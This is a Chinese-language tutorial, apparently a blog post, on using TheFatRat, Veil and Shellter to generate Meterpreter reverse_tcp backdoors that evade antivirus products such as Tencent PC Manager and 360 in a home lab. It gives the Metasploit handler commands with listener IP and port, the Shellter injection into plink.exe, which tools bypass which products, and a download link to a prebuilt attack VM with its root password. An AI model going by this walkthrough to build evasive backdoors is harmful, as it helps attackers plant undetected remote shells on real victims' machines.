前言
在渗透测试中经常遇到有杀毒的软件,不会代码层的我只能寻找几款不错的免杀工具。进行傻瓜式配置。这里推荐三款免杀工具(亲测有效)
实验环境
windows 7 (安装电脑管家)(IP:192.168.72.154)
kali (IP:192.168.72.173)
windows 10 (360安全卫士)(IP:192.168.72.1)
TheFatRat工具
安装
参考资料:Msfvenom傻瓜化后门生成工具
安装过程不算麻烦。我这里已经安装好啦。
使用
选择生成bat文件,听说可以过360。
选择经常使用的payload,和metasploit保持一致。
这里会生成bat文件。该代码为bat源码。
将生成的kali.bat文件剪贴到windows7靶机上进行测试。
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 5555
set lhost 192.168.72.173
经测试发现可以电脑管家没有报毒,但无法绕过360安全卫士。
Veil工具
安装
veil-evasion工具安装起来比较麻烦,我也是安装好久也装上的。但依然存在问题。
如果感觉安装过程太繁琐,可以去云盘上下载直接使用。
下载地址见页尾
这里推荐veil3.1版本的安装教程:Veil3.1免杀安装
使用
选择C语言编写的payload。
进行必要的配置。
生成文件的信息。
将生成文件kali.exe剪切到windows7下进行测试。
依然是绕过电脑管家,无法绕过360。
在尝试使用 python/shellcode_inject/aes_encrypt模块时出现了错误,无法进行有效免杀
Shellter工具
安装
Kali Shellter 5.1:动态ShellCode注入工具 绕过安全软件
我并没有git下来进行安装,而是使用的命令
apt-get install shellter
应用
PE目标为plink.exe
cp /usr/share/windows-binaries/plink.exe /root
依然是选择熟悉的reverse_tcp,进行一些配置即可。
将生成的文件剪切到windows下。
在windows10通过cmd运行plink.exe
plink.exe 192.168.72.173
更多的使用方法--help
同样的配置。
成功得到session会话,且没有被360安全卫士拦截。
附加:
我这里把安装好的环境克隆出来了。下载后只需要打来虚拟机运行即可。
用户名root,密码123456..
百度云盘
https://pan.baidu.com/s/1P9dOiSncPga2lBeZ4xxxdg
提取码: xc37
